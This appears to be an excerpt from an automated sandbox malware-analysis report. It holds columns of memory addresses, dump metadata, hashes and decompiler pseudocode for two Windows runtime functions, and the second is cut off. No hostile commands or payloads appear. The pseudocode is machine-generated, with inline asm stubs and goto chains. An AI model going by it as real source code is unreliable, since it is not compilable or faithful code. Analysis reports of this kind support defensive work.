                                                      0x00000000
                                                      0x0492459f
                                                      0x0492459f
                                                      0x049245a3
                                                      0x0496e1d7
                                                      0x0496e1e4
                                                      0x00000000
                                                      0x049245a9
                                                      0x049245a9
                                                      0x049245b0
                                                      0x0496e1d1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049245b6
                                                      0x049245b6
                                                      0x049245b6
                                                      0x00000000
                                                      0x049245b6
                                                      0x049245b0
                                                      0x049245a3
                                                      0x04924599
                                                      0x0492458c
                                                      0x04924582
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049241f4
                                                      0x0492423e
                                                      0x04924241
                                                      0x049245c0
                                                      0x049245c4
                                                      0x00000000
                                                      0x049245ca
                                                      0x049245ca
                                                      0x00000000
                                                      0x0496e207
                                                      0x0496e20f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049245d1
                                                      0x00000000
                                                      0x00000000
                                                      0x049245ca
                                                      0x00000000
                                                      0x04924247
                                                      0x04924247
                                                      0x04924247
                                                      0x04924249
                                                      0x04924249
                                                      0x04924249
                                                      0x04924251
                                                      0x04924251
                                                      0x04924257
                                                      0x0492425f
                                                      0x0492426e
                                                      0x04924270
                                                      0x0492427a
                                                      0x0496e219
                                                      0x0496e219
                                                      0x04924280
                                                      0x04924282
                                                      0x04924456
                                                      0x049245ea
                                                      0x00000000
                                                      0x049245f0
                                                      0x0496e223
                                                      0x00000000
                                                      0x0496e223
                                                      0x0492445c
                                                      0x0492445c
                                                      0x00000000
                                                      0x0492445c
                                                      0x00000000
                                                      0x04924288
                                                      0x0492428c
                                                      0x0496e298
                                                      0x04924292
                                                      0x04924292
                                                      0x0492429e
                                                      0x049242a3
                                                      0x049242a7
                                                      0x049242ac
                                                      0x0496e22d
                                                      0x049242b2
                                                      0x049242b2
                                                      0x049242b9
                                                      0x049242bc
                                                      0x049242c2
                                                      0x049242ca
                                                      0x049242cd
                                                      0x049242cd
                                                      0x049242d4
                                                      0x0492433f
                                                      0x0492433f
                                                      0x049242d6
                                                      0x049242d6
                                                      0x049242d9
                                                      0x049242dd
                                                      0x049242eb
                                                      0x0496e23a
                                                      0x049242f1
                                                      0x04924305
                                                      0x0492430d
                                                      0x04924315
                                                      0x04924318
                                                      0x0492431f
                                                      0x04924322
                                                      0x0492432e
                                                      0x0492433b
                                                      0x0492433b
                                                      0x00000000
                                                      0x0492432e
                                                      0x049242eb
                                                      0x0492434c
                                                      0x0492434e
                                                      0x04924352
                                                      0x04924359
                                                      0x0492435e
                                                      0x04924361
                                                      0x0492436e
                                                      0x0492438a
                                                      0x0492438e
                                                      0x04924396
                                                      0x0492439e
                                                      0x049243a1
                                                      0x049243ad
                                                      0x049243bb
                                                      0x049243bb
                                                      0x049243ad
                                                      0x0492436e
                                                      0x049243bf
                                                      0x049243c5
                                                      0x04924463
                                                      0x04924463
                                                      0x049243ce
                                                      0x049243d5
                                                      0x049243d9
                                                      0x049243df
                                                      0x04924475
                                                      0x04924479
                                                      0x04924491
                                                      0x04924491
                                                      0x04924479
                                                      0x049243e5
                                                      0x049243eb
                                                      0x049243f4
                                                      0x049243f6
                                                      0x049243f9
                                                      0x049243fc
                                                      0x049243ff
                                                      0x049244e8
                                                      0x049244ed
                                                      0x049244f3
                                                      0x0496e247
                                                      0x00000000
                                                      0x049244f9
                                                      0x04924504
                                                      0x04924508
                                                      0x0492450f
                                                      0x0496e269
                                                      0x00000000
                                                      0x04924515
                                                      0x04924519
                                                      0x04924531
                                                      0x04924534
                                                      0x04924537
                                                      0x0492453e
                                                      0x04924541
                                                      0x0492454a
                                                      0x0496e255
                                                      0x0496e255
                                                      0x0496e25b
                                                      0x0496e25e
                                                      0x0496e261
                                                      0x0496e261
                                                      0x04924555
                                                      0x04924559
                                                      0x0492455d
                                                      0x0496e26d
                                                      0x0496e270
                                                      0x0496e274
                                                      0x0496e27a
                                                      0x0496e27d
                                                      0x0496e28e
                                                      0x0496e28e
                                                      0x04924563
                                                      0x04924563
                                                      0x04924569
                                                      0x04924569
                                                      0x00000000
                                                      0x0492455d
                                                      0x0492450f
                                                      0x00000000
                                                      0x049244f3
                                                      0x049243ff
                                                      0x04924405
                                                      0x04924405
                                                      0x04924405
                                                      0x049242ac
                                                      0x0492428c
                                                      0x04924282
                                                      0x04924407
                                                      0x0492440d
                                                      0x0496e2af
                                                      0x0496e2af
                                                      0x04924413
                                                      0x04924413
                                                      0x00000000
                                                      0x049241d4
                                                      0x00000000
                                                      0x049241c3
                                                      0x049241bd
                                                      0x04924415
                                                      0x04924415
                                                      0x04924416
                                                      0x04924417
                                                      0x04924429
                                                      0x0492416e
                                                      0x0492416e
                                                      0x04924175
                                                      0x04924498
                                                      0x0492449f
                                                      0x0496e12d
                                                      0x00000000
                                                      0x0496e133
                                                      0x00000000
                                                      0x0496e133
                                                      0x049244a5
                                                      0x049244a5
                                                      0x049244aa
                                                      0x00000000
                                                      0x049244bb
                                                      0x049244ca
                                                      0x049244d6
                                                      0x049244d7
                                                      0x049244d8
                                                      0x049244e3
                                                      0x049244e3
                                                      0x049244aa
                                                      0x0492417b
                                                      0x0492417b
                                                      0x0492417b
                                                      0x00000000
                                                      0x0492417b
                                                      0x04924175
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 702acfb61cc3344d951f25a65d527421bb734a7ae01e2c2121bc72e28aad11d4
                                                      • Instruction ID: b4e6482e57236b6d8fcd0c596bd813ba408f1289e013fac0f710bf9afff6a5ff
                                                      • Opcode Fuzzy Hash: 702acfb61cc3344d951f25a65d527421bb734a7ae01e2c2121bc72e28aad11d4
                                                      • Instruction Fuzzy Hash: 7FF18F746086218FCB24CF19C580A3AB7E6FF88718F15493EF486CB254E734E995DB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049320A0, Relevance: .4, Instructions: 420COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E049320A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x49f8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04932EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04932EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E049058EC(_t240);
									_t221 =  *0x49f5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x49f5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04944A2C(0x49f6e40, 0x4944b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04927D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x48e5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0493F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0493F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04987016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04922400(_t267 + 0x20);
															}
															L04922400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04932397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04922280(_t134, 0x49f8608);
									__eflags =  *0x49f6e48 - _t253; // 0xc6b408
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0491FFB0(_t198, _t241, 0x49f8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x49f6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x49f8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04936B90(_t210,  &_v64);
										_t262 =  *0x49f8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0493E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E049497C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0494006A(0x49f8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x49f8608);
												E0494B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x49f6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x49f6e48; // 0xc6b408
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E0491FFB0(_t198, _t240, 0x49f8608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E049400C2(0x49f8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x8
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                      0x049320a0
                                                      0x049320a8
                                                      0x049320ad
                                                      0x049320b3
                                                      0x049320b8
                                                      0x049320c2
                                                      0x049320c7
                                                      0x049320cb
                                                      0x049320d2
                                                      0x04932263
                                                      0x04932266
                                                      0x04975836
                                                      0x04975836
                                                      0x00000000
                                                      0x0493226c
                                                      0x0493226c
                                                      0x04932270
                                                      0x04932274
                                                      0x049320e2
                                                      0x049320e2
                                                      0x049320e6
                                                      0x049320ee
                                                      0x049757dc
                                                      0x049757de
                                                      0x049757ec
                                                      0x049757ec
                                                      0x049757f1
                                                      0x049757f3
                                                      0x049757f8
                                                      0x00000000
                                                      0x049757f8
                                                      0x049757e0
                                                      0x049757e4
                                                      0x049757ea
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049757ea
                                                      0x049320f4
                                                      0x049320f4
                                                      0x049320f8
                                                      0x049320f8
                                                      0x049320fc
                                                      0x04932100
                                                      0x04932106
                                                      0x04932201
                                                      0x04932206
                                                      0x0493220b
                                                      0x0493220e
                                                      0x049322a9
                                                      0x049322ac
                                                      0x00000000
                                                      0x00000000
                                                      0x049322b2
                                                      0x049322b5
                                                      0x04975801
                                                      0x04975806
                                                      0x00000000
                                                      0x00000000
                                                      0x04975810
                                                      0x04975815
                                                      0x04975818
                                                      0x00000000
                                                      0x00000000
                                                      0x0497581e
                                                      0x049322bb
                                                      0x049322bb
                                                      0x04932218
                                                      0x04932218
                                                      0x0493221c
                                                      0x04932220
                                                      0x04932222
                                                      0x049322c2
                                                      0x049322c4
                                                      0x049322dc
                                                      0x049322dc
                                                      0x049322e1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049322e7
                                                      0x049322c8
                                                      0x049322cd
                                                      0x049322d3
                                                      0x049322d6
                                                      0x04975823
                                                      0x04975825
                                                      0x04975827
                                                      0x00000000
                                                      0x00000000
                                                      0x0497582d
                                                      0x00000000
                                                      0x0497582d
                                                      0x00000000
                                                      0x04932228
                                                      0x04932228
                                                      0x00000000
                                                      0x04932228
                                                      0x04932222
                                                      0x04932214
                                                      0x04932214
                                                      0x00000000
                                                      0x04932114
                                                      0x04932114
                                                      0x04932114
                                                      0x0493211a
                                                      0x0493211c
                                                      0x04932348
                                                      0x0493234d
                                                      0x04975840
                                                      0x04975845
                                                      0x04975848
                                                      0x0497584e
                                                      0x0497584e
                                                      0x04975848
                                                      0x04932353
                                                      0x04932355
                                                      0x04932388
                                                      0x04932388
                                                      0x04932368
                                                      0x0493236a
                                                      0x0493236c
                                                      0x0493238f
                                                      0x00000000
                                                      0x0493236e
                                                      0x0493236e
                                                      0x0493218e
                                                      0x0493218e
                                                      0x04932191
                                                      0x04932195
                                                      0x04975a03
                                                      0x04975a06
                                                      0x04975a0c
                                                      0x04975a0f
                                                      0x04975a11
                                                      0x04975a13
                                                      0x04975a13
                                                      0x04975a19
                                                      0x04975a1f
                                                      0x00000000
                                                      0x0493219b
                                                      0x0493219b
                                                      0x049321a0
                                                      0x04932282
                                                      0x04932284
                                                      0x04932284
                                                      0x04932284
                                                      0x04932284
                                                      0x049321a6
                                                      0x049321a9
                                                      0x049321ac
                                                      0x049321ae
                                                      0x049321b3
                                                      0x0493228b
                                                      0x04932290
                                                      0x04932379
                                                      0x04932296
                                                      0x04932298
                                                      0x04932298
                                                      0x04932290
                                                      0x049321b9
                                                      0x049321be
                                                      0x049322a2
                                                      0x049322a2
                                                      0x049321c4
                                                      0x049321c8
                                                      0x049321cc
                                                      0x049321d0
                                                      0x049321d4
                                                      0x049321de
                                                      0x049321e3
                                                      0x04975a29
                                                      0x04975a2c
                                                      0x00000000
                                                      0x00000000
                                                      0x04975a3b
                                                      0x00000000
                                                      0x049321e9
                                                      0x049321e9
                                                      0x049321e9
                                                      0x049321ee
                                                      0x049321f1
                                                      0x04975a45
                                                      0x04975a4b
                                                      0x04975a52
                                                      0x04975a58
                                                      0x04975a5d
                                                      0x04975a5f
                                                      0x04975a71
                                                      0x04975a61
                                                      0x04975a6a
                                                      0x04975a6a
                                                      0x04975a76
                                                      0x04975a79
                                                      0x04975a7f
                                                      0x04975a83
                                                      0x04975a85
                                                      0x04975a87
                                                      0x04975a87
                                                      0x04975a8c
                                                      0x04975a91
                                                      0x04975a97
                                                      0x04975a9f
                                                      0x04975aa0
                                                      0x04975aa1
                                                      0x04975aa6
                                                      0x04975aab
                                                      0x04975ab1
                                                      0x04975ab3
                                                      0x04975ab9
                                                      0x04975aca
                                                      0x04975ad4
                                                      0x04975ad4
                                                      0x04975ade
                                                      0x04975ade
                                                      0x04975aab
                                                      0x04975a79
                                                      0x04975a52
                                                      0x049321f7
                                                      0x049321f9
                                                      0x049321fe
                                                      0x049321fe
                                                      0x049321e3
                                                      0x04932195
                                                      0x0493236c
                                                      0x04932122
                                                      0x04932122
                                                      0x04932124
                                                      0x04932231
                                                      0x04932236
                                                      0x04932236
                                                      0x04932238
                                                      0x04932238
                                                      0x04932240
                                                      0x04932242
                                                      0x04932244
                                                      0x049759fc
                                                      0x0493218c
                                                      0x0493218c
                                                      0x00000000
                                                      0x0493218c
                                                      0x0493224a
                                                      0x0493224f
                                                      0x04932256
                                                      0x04932304
                                                      0x04932309
                                                      0x0493230f
                                                      0x0493231e
                                                      0x0493231e
                                                      0x0493231e
                                                      0x04932320
                                                      0x04932325
                                                      0x0493232a
                                                      0x0493232c
                                                      0x0493233e
                                                      0x0493233e
                                                      0x00000000
                                                      0x0493232c
                                                      0x04932311
                                                      0x04932317
                                                      0x0493231a
                                                      0x0493231c
                                                      0x04932380
                                                      0x04932380
                                                      0x04932380
                                                      0x04932384
                                                      0x00000000
                                                      0x00000000
                                                      0x04932386
                                                      0x00000000
                                                      0x0493231c
                                                      0x0493225c
                                                      0x0493225c
                                                      0x00000000
                                                      0x0493225c
                                                      0x0493212a
                                                      0x04932134
                                                      0x04932138
                                                      0x0493213d
                                                      0x04975858
                                                      0x04975863
                                                      0x04975863
                                                      0x04975867
                                                      0x0497586a
                                                      0x00000000
                                                      0x00000000
                                                      0x0497586c
                                                      0x0497586c
                                                      0x04975871
                                                      0x04975875
                                                      0x04975877
                                                      0x04975997
                                                      0x0497599c
                                                      0x049759a1
                                                      0x049759a7
                                                      0x049759a7
                                                      0x00000000
                                                      0x049759a7
                                                      0x0497587d
                                                      0x00000000
                                                      0x0497588b
                                                      0x0497588b
                                                      0x04975890
                                                      0x04975892
                                                      0x04975894
                                                      0x04975899
                                                      0x0497589b
                                                      0x049758a0
                                                      0x049758a0
                                                      0x049758aa
                                                      0x049758b2
                                                      0x049758b6
                                                      0x049758be
                                                      0x049758c6
                                                      0x049758c9
                                                      0x0497590d
                                                      0x04975917
                                                      0x0497591a
                                                      0x0497591c
                                                      0x04975920
                                                      0x04975928
                                                      0x0497592a
                                                      0x0497592c
                                                      0x0497592e
                                                      0x0497592e
                                                      0x049758cb
                                                      0x049758cd
                                                      0x049758d8
                                                      0x049758e0
                                                      0x049758f4
                                                      0x049758fe
                                                      0x049758fe
                                                      0x0497593a
                                                      0x0497593e
                                                      0x04975940
                                                      0x04975942
                                                      0x00000000
                                                      0x04975944
                                                      0x04975944
                                                      0x04975949
                                                      0x0497594e
                                                      0x0497594e
                                                      0x04975953
                                                      0x0497595b
                                                      0x04975976
                                                      0x04975976
                                                      0x0497597a
                                                      0x0497597f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04975981
                                                      0x04975981
                                                      0x04975981
                                                      0x04975983
                                                      0x04975988
                                                      0x0497598d
                                                      0x04975991
                                                      0x04975991
                                                      0x00000000
                                                      0x0497595d
                                                      0x0497595d
                                                      0x04975963
                                                      0x04975965
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04975967
                                                      0x04975967
                                                      0x0497596b
                                                      0x0497596d
                                                      0x00000000
                                                      0x00000000
                                                      0x0497596f
                                                      0x04975971
                                                      0x04975971
                                                      0x04975974
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04975974
                                                      0x00000000
                                                      0x04975967
                                                      0x0497595b
                                                      0x04975942
                                                      0x04975863
                                                      0x04932143
                                                      0x04932143
                                                      0x04932149
                                                      0x0493214f
                                                      0x049322ec
                                                      0x049322f1
                                                      0x049322f6
                                                      0x00000000
                                                      0x049322f6
                                                      0x04932159
                                                      0x04932173
                                                      0x04932173
                                                      0x0493217d
                                                      0x04932181
                                                      0x04932186
                                                      0x049759ae
                                                      0x049759b2
                                                      0x049759b5
                                                      0x049759b7
                                                      0x049759ba
                                                      0x049759cd
                                                      0x049759d1
                                                      0x049759d5
                                                      0x049759d9
                                                      0x049759db
                                                      0x00000000
                                                      0x00000000
                                                      0x049759dd
                                                      0x049759dd
                                                      0x049759e1
                                                      0x049759e4
                                                      0x049759e7
                                                      0x049759ee
                                                      0x049759ee
                                                      0x049759f3
                                                      0x049759f3
                                                      0x00000000
                                                      0x04932186
                                                      0x04932164
                                                      0x0493216d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0493216d
                                                      0x04932106
                                                      0x04932266
                                                      0x049320d8
                                                      0x049320da
                                                      0x049320e0
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dc6483c09c4fa039da74f0039f566cfc0b4458101fe5a8fe6d242387c81f919a
                                                      • Instruction ID: 2bdc7427bd797b6cf6e0986323803e25a38590aeddcb9695d0359f73d7d19d00
                                                      • Opcode Fuzzy Hash: dc6483c09c4fa039da74f0039f566cfc0b4458101fe5a8fe6d242387c81f919a
                                                      • Instruction Fuzzy Hash: 5FF11631608341AFD765CF68C940B6A77EAAFC6724F058D7DE9959B280E734F841CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491D5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E0491D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
